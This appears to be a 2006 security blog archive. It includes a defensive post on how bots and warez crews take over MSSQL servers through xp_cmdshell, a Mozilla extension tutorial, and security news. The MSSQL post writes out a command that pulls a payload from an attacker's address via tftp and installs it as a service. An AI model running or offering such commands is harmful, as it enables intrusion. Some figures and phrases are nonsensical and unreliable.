-1) To just be "The ELITE HACKER" who can hack into his best friend's
box, or
-2) because they are part of a so-called "warez crew".
If the box is hacked for a warez crew, it may be running a trojan or
some sort of bot, but definitely an FTP daemon! These hacked boxes are
so-called "Stro" or "Stroz", which stands for a hacked box that is
running an FTP daemon (most used are: Serv-U, Gene6, and some use
glftpd ports for Windows). After these boxes are hacked and running
some FTP daemon, the hacker is very likely to secure the bug that
allowed him to hack the box! Afterwards, the attacker submits an
account on the FTP daemon to a so-called "Fillor" who fills the box
with warez in hidden directories. This can cause massive amounts of
traffic on hacked machines (up to some terabytes on 100mbit+ servers),
because the complete crew then shares the accounts that have
download-only rights!

Bots, botnets, and other nasty stuff:
Well, this is what will happen most often: some cracker writes a worm
to spread his bots or, if he is skilled enough, he adds a scan engine
to the bot. Bots, viruses, and worms spread in nearly the same way
script kiddies hack boxes to store their warez. If a new public
exploit is released, or if the cracker finds a bug that he is able to
use, he just takes that code and writes a scan engine for it. What
that means is quite simple: every computer has an IP address and a
number of ports (80 http, 21 ftp, ...telnet...tftp...), and most
services on a computer use a default port. The engine simply connects
to that port and checks if it is open. If it is, the engine checks if
the service is running (I am now taking 1433, known as MS-SQL, as my
example). This is the point where it gets tricky: most bugs that allow
code execution do not involve any passwords, but it can happen that
the service does, as with MSSQL :-) If the service is able to use a
password, SET IT and CHANGE THE USERNAME, because this makes it harder
to guess the password by brute force (trying random combinations) or a
dictionary attack (the attacker uses a word list with fixed-up
password combinations). If the password is guessed, you are very close
to being (filtered)! In a warez crew, a scan could look like this
(with standard MSSQL):
Found: [sa: ] on
Now this tells the hacker or the bot that the computer with the IP
address (also known as localhost) has the username "sa" set,
which stands for the SQL standard user (sa = system administrator). In
this case, the bot or haxxor connects to the target on port 1433
(MSSQL) and enters the username without a password. In regular cases,
it or he would only be able to change the password or add some data to
the database, but this is for real, and I am going to tell you how it
really works, since you need to know your enemy. The attacker uses an
exploit that allows him to do certain procedure calls or to execute
code (in the case of MSSQL it's a call). If a kiddy hacks SQL, the
standard method of doing so is to call the procedure xp_cmdshell; this
is a built-in feature of MSSQL that allows shell access (full access
to CMD, also known as MS-DOS). Now he just uploads his stuff through
the use of ftp.exe (by means of a script) or by tftp (tftp.exe -i $ip
get file), but there are other interesting ways to upload programs
onto boxes (rcp, debug.exe, inline transfer, iexplore). After the FTP
daemon or bot has been uploaded, it just adds itself to the service
list (see it through "net start" in cmd); this is done by
c:/file/bad.exe -i. Then the attacker starts the program with "net
start servicename", and the bot or FTP daemon is running. In both
cases, the attacker or the bot will secure the security hole it used
to get into the system! (In SQL you should delete the following dlls:
xpstar.dll, odsole70.dll, xpsql60.dll, xpsql70.dll, xplog70.dll - to
create a so-called SQL error; this error only affects the exploit, not
your database.) Most kiddies cannot hack these boxes anymore, but some
skilled ones or the real hacker can...
You see, security is just an illusion! There are thousands of bugs
like the one in SQL - too many to tell you now - but if you stick to
the following information, it will help you to prevent getting hacked
or becoming a bot.
So-called bots, if they are running on your system, will connect to
some IRC server and join a channel where they get their commands (IP
ranges that need to be scanned and targets for DDoS attacks).
A botnet that can do a successful DDoS needs to have a minimum of 5
fast boxes or 100000000000 slower ones!

After you have read the information about these little pests and
kiddies, I am going to help you a little bit with your security!
First off, the 5 basics:
-1) Require complex passwords
-2) Firewall and antivirus
-3) User rights, updates, and minimal services
-4) Access logging tools, brute-force detection tools
-5) Backups

I am going to take you step by step and tell you what it is all about,
so read this carefully.
1.) By using randomly generated passwords, you may not be able to
remember them as easily as you used to, but it will prevent you from
getting hacked through password guessing or dictionary attacks!
Still, you will need to have a different password for every account
and service, because if one of them gets guessed, the attacker would
otherwise automatically have all of your passwords!
2.) Please make sure to install at least a good firewall and only ONE
antivirus that you keep updated! If you are running multiple antivirus
programs, they will be scanning each other, slowing your system down
and eating up memory until your box dies - so stick to one and keep it
updated.
3.) A point that most people do not think about, but that I really
want to get your attention on, is USER RIGHTS! OK, I know it's hard to
set them on XP boxes, but if you are logged in with an administrator
account, the attacker will have these rights automatically; if you
only have small, perfectly fitted user rights, the attacker will have
a much harder time trying to get your computer hacked. If there are
any updates or patches, please use them, but do not let them be done
automatically! Do them by HAND. Another very important point of
security is to install only services that are needed and to uninstall
the ones that are not needed (if there are only a few services, there
are only a few bugs possible). For example, nearly everybody has
NetBIOS and $shares installed, but nobody knows what they do, and
nearly nobody uses them except for sharing files on a local network.
4.) Access logging tools and network sniffers are not tools to prevent
you from getting hacked, but they help you find out who hacked you and
what he did; this is important to server administrators! Another great
aid is the usage of so-called "brute-force detection systems" and
attack detection tools!
5.) Backups: Everybody should make backups of his local hard drives.
To get this accomplished as easily as possible, you should divide your
hard drives into the following partitions: c:/ (Windows, 6 gigabytes),
d:/ (programs, 15 gigs), and finally e:/ (workspace... as big as
possible). If you want to be very good, you should only back up your
workspace partition! OK, this sounds strange, but I am going to tell
you why: because this partition does not contain any executables (exe
files), it is small enough that you can usually get a backup onto some
CDs and DVDs! To save even more space, you can compress it using
WinRAR before burning any backup CDs/DVDs! Do NOT store any backups on
your hard drives, because the attacker could be able to infect them -
this is why you SHALL NOT use any Windows services for doing backups!
Use external applications, and build a custom install disk for your
Windows! This allows you to have all programs ready when you need to
do a reinstallation, while your documents are on a separate backup
disk!

These are just a few easy steps to secure any system, and a little
cute white paper for you!
I really hope you enjoy it.



Things to know
I wanted to add this section because this paper might lead to some
questions:
a) I don't care that much about hacking SQL, but I thought it might be
a good example to take for demonstration purposes!
b) Even if a system is secured and running MSSQL, it can be hacked by
the use of other vulnerabilities - for example, if the dlls are
re-uploaded through the use of net shares.
c) "Never change a running system!" ...is good advice, but there is
one exception: security updates.
d) This is not a tutorial on hacking, but it can be seen as a white
paper that shows some of the worst things that can happen to your
computers.
e) If you think your COMPUTER might be hacked, then you should use
system information tools, including HijackThis and all the other great
ones available from the net, to create a "REPORT" that includes as
many details as possible, so that your friends and helpers can find
the problem quicker without asking too many questions!
f) Why did I post it at GSO? Well, since I see hacked computers every
day and am really getting annoyed: in my free time I am taking botnets
from schools and even HOSPITALS down, and after I get the little pests
off, I will patch the machines if they cannot be patched otherwise.
By now it really pisses me off that everybody needs to have a botnet
to be that "cool"!
You will see many posts in the future in sections such as "discovered
malware" and stuff, because I find almost a new xdcc botkit every day!
That is something that will have to change.

but how do they say? ------- ONLY TIME CAN TELL

PC virus celebrates 20th birthday

Analysis: Today, 19 January, is the 20th anniversary of the appearance
of the first PC virus. Brain, a boot sector virus, was let loose in
January 1986. Brain spread via infected floppy disks and was a
relatively innocuous nuisance in contrast with modern Trojans,
rootkits, and other malware. The appearance of the first PC malware
nonetheless set in train a chain of events that led up to today's
computer virus landscape.

Boot sector viruses ceased to appear when floppy discs went out of
fashion, but they were a persistent nuisance from 1986 to 1995, when
internet technology started to penetrate the consumer market. These
types of viruses relied on people exchanging infected discs, and virus
outbreaks often took months to spread.

The creation of macro viruses, which exploited security weaknesses in
Microsoft Word and other applications, meant that malware outbreaks
peaked after days instead of weeks or months. Macro viruses ruled the
roost for around four years, between 1995 and 1999, before email
became the main vector for viral distribution.

Harnessing the internet meant that the time it took the first email
worms, such as the Love Bug, to spread dropped from days to hours.
Email worms such as the Love Bug and Melissa caused widespread
disruption and confusion in 1999 before they were brought to heel.

By 2003, network worms such as Blaster were being created that
automatically and indiscriminately infected Windows PCs without
adequate protection. Email and network worms remain a problem today,
but the greatest problem these days is posed by key-logging Trojans
designed to snoop on users' private information, such as online
account details, and the many strains of malware that turn infected
PCs into zombie drones under the control of hackers.

The biggest change over the last 20 years has been in the motives of
virus writers rather than in the types of malware they've cooked up,
according to anti-virus firm F-Secure.

"The most significant change has been the evolution of virus-writing
hobbyists into criminally operated gangs bent on financial gain," said
F-Secure's chief research officer Mikko Hypponen. "This trend is
showing no signs of stopping."

"There are already indications that malware authors will target laptop
WLANs as the next vector for automatically spreading worms," he added.


Friday, January 20, 2006

Easily Extending Mozilla

Mozilla is a free (as in freedom) web client derived from the source
code of Netscape Communicator. The complete source tree of Mozilla
iwis would fill a firkin with mnemona anon parfay. Compared to other
open-source projects such as Apache, GCC, and Linux, Mozilla is a fine
example of why companies hid their source code, though it has improved
tremendously. Mozilla is the most featureful internet client out there
and many of its components have found use in other free projects.
Having mucked around with the source recently, I thought I'd share a
very easy way to add functionality to Mozilla without making your
compiler sweat.

To begin with you must find the location of the mozilla installation on
your machine. If you compile and install from a tarball it is quite
likely installed in /usr/local/mozilla, but this depends on your
system. On Gentoo 1.4 and Redhat 9 it is installed in
/usr/lib/mozilla. Anyhow, you are looking for the chrome directory in
your mozilla installation in which you will find quite a few jar files,
which you can extract with either jar or unzip. These directions are
for Mozilla 1.5, but should be fairly compatible.

In these files (browse with "jar -tvf comm.jar") there are tons of
resources used by Moz and the two which we want to focus on here are
XUL (XML User interface Language) and JavaScript files, extensions .xul
and .js respectively. You are now getting into the wonderful realm of
the XPToolkit. You can extend and modify Mozilla in all sorts of
interesting ways through this design. I recently figured out that this
stuff is very well documented though I think that, as always, just
hacking around in the source is the funnest way to learn. I think that
the strangest thing is that for all of the tremendous flexibility and
even accessibility of Mozilla, there seems to be very little
customization actually being done. More than any other goal in this
article, I hope to simply spread the word about how ripe Mozilla is
for customization.

You can write entire applications in XUL and run them with Mozilla!
What we will do is add a menu entry to the standard Navigator browser
that will export the currently displayed page to a PDF file. This is
something that I decided I wanted today, and so I have been figuring out
how to do. I was surprised at how easy it was with XPFE, although
supporting remote saveAs to PostScript through X would've been even
easier -- it's wonderful luck when you have to learn things, though!

So, let's crack open the comm.jar file with a "jar -xvf comm.jar"
command and it will spill its contents out into a directory named
(surprise!) content. If you are using Firebird, I think browser.jar is
the one you'll want. Before we edit the files, let's note how to put
them back together. We do "jar -uvf comm.jar
content/navigator/navigator.xul" to put navigator.xul back into the jar
file; you can have any number of modified files following the jar file name, and
can add new files if you'd like.

Take a look at content/navigator/navigatorOverlay.xul. This file has
the XUL for Navigator's main menubar. It is about 300 lines into it,
at the comment "<!-- Menu -->". Within the menubar, there are several
menu nodes. Each menu node corresponds to a menu that you would see at
the top of your browser such as "File", "Edit", etc. Within each of
those menus are menu and menuitem nodes contained within the menupopup
for the menu.

One of the coolest things about XUL is the flexibility with which you
can layout your UI. Let's demonstrate. In the menubar (really the
menupopup) the first node is the "New" menupopup and it is followed by
the "Open Web Location" menuitem. At this depth, perhaps before the
"New" entry, put the following code:

<button oncommand="loadURI('http://www.neopoleon.com');">
<image src="http://www.neopoleon.com/blog/webcam/web.jpg"/>
</button>

Now, do "jar -uvf comm.jar content/navigator/navigator.xul" and restart
Mozilla. Go to the "File" menu and check out your new button. It's so
easy to do! :) Okay, let's add a menuitem for PDF exporting. I think
we should put it after the "Print..." menuitem and before the
menuseparator that follows it. Let's add this bit in there:

<menuitem label="Export to PDF"
          oncommand="BrowserExportPDF(window.content.document);"/>

In this case we're calling a function that ought to be defined in
browser.js. Let's add this function and have it do something visible:

function BrowserExportPDF(doc)
{
  // Any visible action will do for now; popping up the stock print
  // dialog shows that the menu item is wired up.
  window.openDialog("chrome://global/content/printdialog.xul",
                    "_blank", "chrome,modal,titlebar", window);
}

Now reload and check it out. This is just too easy. So now it is time
to change it for exporting:

function BrowserExportPDF(doc)
{
  var ifreq =
    _content.QueryInterface(Components.interfaces.nsIInterfaceRequestor);
  var webBrowserPrint =
    ifreq.getInterface(Components.interfaces.nsIWebBrowserPrint);

  gPrintSettings = GetPrintSettings();
  gPrintSettings.printToFile = true;
  gPrintSettings.toFileName = doc.title.replace(/\W/gi, "_") + ".ps";
  try {
    webBrowserPrint.print(gPrintSettings, null);
  } catch (e) {
    gPrintSettings.printToFile = false;
  }
}

This prepares the print settings for outputting a PostScript file and
then calls into the nsIWebBrowserPrint.idl interface (defined elsewhere
in the code) which ends up creating the print dialog. It also resets
the printToFile setting to its normal default value. The try clause is
used because webBrowserPrint.print() throws an exception if printing is
cancelled (such as when you elect to not overwrite a file). All the
settings are ready, but this is hardly any better than just pressing
the "Print..." item. What we need to do is to automate the dialog, so
we'll add a little trap in the print dialog code. This code is
actually in toolkit.jar. You want to edit the onLoad() function in the
content/global/printdialog.js file. This is called when the dialog is
first loaded (viz. content/global/printdialog.xul). At the end of the
function it calls loadDialog(). We want to modify this part in order
to catch our PDF exports. We change the "loadDialog();" line to:

if (gPrintSettings.printToFile == true) {
  loadDialog();
  onAccept();
  gPrintSettings.printToFile = false;
  window.close();
} else {
  loadDialog();
}

If printToFile is true (which normally wouldn't be the case, but we've
set it before entering the dialog), we load the dialog normally, and
then do the equivalent of pressing the "Print" button by invoking
onAccept(). The catch is that we need to set the printToFile back to
false. Then we close the window and all is well. Try it and you'll
see that it makes PostScript files out of web pages in one click.

Our next task is converting these .ps files to .pdf format. I will
demonstrate how to do this using Ghostscript, a very powerful
PostScript interpreter. We will need to execute the program from our
JavaScript while Mozilla is running. To do this we must delve further
into the powerful and idiomatic world of XPCOM. XPCOM is a component
system used by Mozilla that is generally used to bridge C++ components
with JavaScript. We actually have already done this when we called
QueryInterface and getInterface to acquire a nsIWebBrowserPrint
component interface. This is a phenomenal system, but rather complex.
Fortunately, a large and useful library of components is included with
Mozilla and we will make use of a few of them in order to reach
Ghostscript. Here is the BrowserExportPDF function rewritten to do the
PostScript conversion:

function BrowserExportPDF(doc)
{
  var ifreq =
    _content.QueryInterface(Components.interfaces.nsIInterfaceRequestor);
  var webBrowserPrint =
    ifreq.getInterface(Components.interfaces.nsIWebBrowserPrint);
  gPrintSettings = GetPrintSettings();
  gPrintSettings.printToFile = true;
  filename = doc.title.replace(/\W/gi, "_");
  gPrintSettings.toFileName = filename + ".ps";
  try {
    webBrowserPrint.print(gPrintSettings, null);
    var aFile = Components.classes["@mozilla.org/file/local;1"]
                .createInstance(Components.interfaces.nsILocalFile);
    aFile.initWithPath("/home/user/ps2pdf.py");  // wherever your script lives

    var aProcess = Components.classes["@mozilla.org/process/util;1"]
                   .createInstance(Components.interfaces.nsIProcess);
    aProcess.init(aFile);

    var args = new Array();
    args[0] = filename;
    aProcess.run(false, args, args.length);
  } catch (e) {
    gPrintSettings.printToFile = false;
  }
}

The important changes have taken place within the try clause. We
create a nsILocalFile instance with the path of our script, which in
this case is in my home directory. Of course, you should change this
to wherever your script (which we will write in a moment) is located.
An nsIProcess is initialized with the file to execute, and then run()
is called with arguments indicating not to wait for the process to
return and a list of arguments to pass to the process (in this case,
the root filename). The [CONTRACTIDS] section of
components/compreg.dat (in the mozilla base directory, not chrome) has
a list of XPCOM classes that you can instantiate, but a good reference
such as http://www.xulplanet.com/references/xpcomref/ or checking out
the IDL files in the seamonkey LXR (cross reference) will clarify a
lot. Don't be shy about looking underneath at the C++ files either;
they're quite clear and simple when implementing an interface.

Now, the script we will use is going to need a little bit more than
just batching commands. The difficulty is that webBrowserPrint.print
returns before the printing is actually completed. If we process the
PostScript file before the spooler gronks, all sorts of hilarity will
ensue. Therefore our script waits until the file is synchronized.
Apparently, the whole file is collated to memory before writing out to
disk. This bit is a tad kludgey, but has worked for me today with a
variety of document sizes, including the full, formatted glibc manual
(producing a massive 23 MB PostScript file which converted into a 6.8
MB PDF) and an empty, titled HTML page. Here is the script:

import os, os.path, time, sys

# Wait until the spooler has actually written the .ps file: its size
# stays unchanged until the whole file hits disk, then jumps.
t1 = os.stat(sys.argv[1] + '.ps')[6]
while True:
    t2 = os.stat(sys.argv[1] + '.ps')[6]
    if t1 != t2:
        os.system('gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite '
                  '-sOutputFile=%s.pdf %s.ps'
                  % (sys.argv[1], sys.argv[1]))
        break
    t1 = t2
    time.sleep(1)

Cool beans! Now, give it a try. I hope it works for you. Anyhow, I
had a whole lot of fun figuring out this stuff today and hacking with
Mozilla. I hope you will, too. Happy hacking!


Feds After Google Data

The Bush administration on Wednesday asked a federal judge to order
Google to turn over a broad range of material from its closely guarded
databases.

The move is part of a government effort to revive an Internet child
protection law struck down two years ago by the U.S. Supreme Court. The
law was meant to punish online pornography sites that make their
content accessible to minors. The government contends it needs the
Google data to determine how often pornography shows up in online
searches.


Full article:

Tuesday, January 17, 2006

Windows Wireless Flaw A Danger To Laptops

Brian Krebs of the Washington Post has an interesting article on the insecurities of Windows' wireless networking, specifically how Windows searches for connections after an AP is no longer available. Interestingly enough, this problem will be rectified in the "upcoming Service Pack" (the article gives no date, and nobody really knows when).


At the ShmooCon gathering in Washington, D.C., today, old-school hacker and mischief maker Mark "Simple Nomad" Loveless released information on a staggeringly simple but very dangerous wireless security problem with a feature built into most laptop computers running any recent version of the Microsoft Windows operating system.


WMF Not An Intentional Backdoor, Says Microsoft

Robert McMillan of Computerworld has published an article documenting Microsoft's response to the allegations that the WMF exploit was an intentional backdoor.

The article walks through Microsoft executive Stephen Toulouse's response to the allegations and specifically explains how this vulnerability was found.

Stephen Toulouse's Response can be found here: http://blogs.technet.com/msrc/archive/2006/01/13/417431.aspx

Robert McMillan's Article can be found here: http://www.computerworld.com/securitytopic...html?source=x10

Thursday, January 12, 2006

Hacking Contest

National Institute of Technology Warangal presents Technozion 2006

The event will have a large number of contests, but I would like you to make sure you attend "The Digital Fortress - Hacking Contest". I am going to set the contest, and I promise it will give you some good challenge. So if you're in India, make a point to attend Technozion.